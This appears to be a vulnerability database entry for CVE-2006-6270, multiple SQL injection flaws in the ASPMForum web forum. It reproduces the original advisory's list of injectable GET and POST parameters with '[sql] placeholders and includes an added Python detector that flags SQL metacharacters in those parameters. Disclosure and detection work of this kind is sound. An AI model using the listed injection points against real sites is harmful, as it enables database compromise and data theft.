ASPMForum Multiple SQL Injection Vulnerabilities

Vulnerability ID: 1192651    Vulnerability type: SQL injection
Published: 2006-12-04    Updated: 2006-12-04
CVE ID: CVE-2006-6270    CNNVD-ID: CNNVD-200612-070
Platform: N/A    CVSS score: 10.0
|Vulnerability sources
https://www.securityfocus.com/bid/82209
https://cxsecurity.com/issue/WLB-2006120035
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200612-070
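|Vulnerability details
ASPMForum contains multiple SQL injection vulnerabilities. A remote attacker can execute arbitrary SQL commands via (1) the soruid parameter in forum2.asp, (2) the ak parameter in kullanicilistesi.asp, (3) the kelimeler parameter in aramayap.asp, and (4) the kullaniciadi parameter in giris.asp; a remote authenticated user can execute arbitrary SQL commands via (5) the mesajno parameter in mesajkutum.asp.
|Exploit (EXP)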
vendor site:http://www.kervancilar.com/
product:Aspmforum
bug:injection sql (get & post)
risk:high

injection sql get :
/forum.asp?baslik='[sql]
/forum2.asp?baslik=2&soruid='[sql]
/kullanicilistesi.asp?ak=&at=&harf='[sql]
/kullanicilistesi.asp?at=baslayan&ak='[sql]
once logged : 
/mesajkutum.asp?eylem=oku&mesajno='[sql]    //private message

injection sql post:
in : /aramayap.asp
Variables:
kelimeler='[sql]
or just post your query into the search engine ...

in : /giris.asp
Variables:
kullaniciadi='[sql]&parola=&I1.x=0&I1.y=0&I1=Submit
or just post your query into the username field

laurent gaffi & benjamin moss
http://s-a-p.ca/
contact: saps.audit (at) gmail (dot) com
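
A defender-side check for the entry points listed in this record, as an added example that is not part of the original advisory or the vendor's code: it flags requests to the named scripts whose listed parameter carries SQL metacharacters. The record layout, the metacharacter heuristic and the treatment of soruid and mesajno as numeric are assumptions; the sample requests are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Script -> parameters named in this record (details section and advisory).
WATCHED = {
    "forum.asp": {"baslik"},
    "forum2.asp": {"soruid"},
    "kullanicilistesi.asp": {"ak", "harf"},
    "mesajkutum.asp": {"mesajno"},
    "aramayap.asp": {"kelimeler"},
    "giris.asp": {"kullaniciadi"},
}
NUMERIC = {"soruid", "mesajno"}          # assumption: these are integer ids
SQL_META = re.compile(r"""['";]|--|/\*""")  # heuristic, expect some false positives

def suspicious_params(url, body=""):
    """Return [(script, param, decoded_value)] for watched parameters that look unsafe."""
    parts = urlsplit(url)
    script = parts.path.rsplit("/", 1)[-1].lower()
    watched = WATCHED.get(script)
    if not watched:
        return []
    pairs = parse_qsl(parts.query, keep_blank_values=True)
    pairs += parse_qsl(body, keep_blank_values=True)   # form-encoded POST body
    hits = []
    for name, value in pairs:                # parse_qsl already percent-decodes
        name = name.lower()
        if name not in watched:
            continue
        if name in NUMERIC:
            bad = re.fullmatch(r"[0-9]*", value) is None
        else:
            bad = SQL_META.search(value) is not None
        if bad:
            hits.append((script, name, value))
    return hits

def scan(records):
    """records: iterable of (method, url, body); returns [(record_no, script, param, value)]."""
    findings = []
    for no, (method, url, body) in enumerate(records, 1):
        form = body if method.upper() == "POST" else ""
        findings += [(no, *hit) for hit in suspicious_params(url, form)]
    return findings

SAMPLES = [  # constructed requests, not taken from real logs
    ("GET", "/forum2.asp?baslik=2&soruid=15", ""),
    ("GET", "/forum2.asp?baslik=2&soruid=15%27", ""),
    ("POST", "/giris.asp", "kullaniciadi=admin%27&parola=&I1.x=0&I1.y=0&I1=Submit"),
    ("POST", "/aramayap.asp", "kelimeler=forum+rules"),
    ("GET", "/mesajkutum.asp?eylem=oku&mesajno=7a", ""),
]
```

Web server access logs typically record only the query string, so the two POST parameters (kelimeler, kullaniciadi) need a source that captures request bodies, such as a WAF or reverse-proxy log.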
|Affected products
Kervancilar Aspmforum 0
|References

Source: BUGTRAQ
Name: 20061115 Aspmforum [multiples injection sql (get & post)]
Link: http://www.securityfocus.com/archive/1/archive/1/451958/100/200/threaded
Source: BID
Name: 21113
Link: http://www.securityfocus.com/bid/21113
Source: SREASON
Name: 1963
Link: http://securityreason.com/securityalert/1963